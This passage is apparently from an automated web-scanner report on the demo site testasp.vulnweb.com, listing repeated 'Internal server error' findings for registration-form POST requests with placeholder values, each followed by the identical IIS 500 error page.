URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server 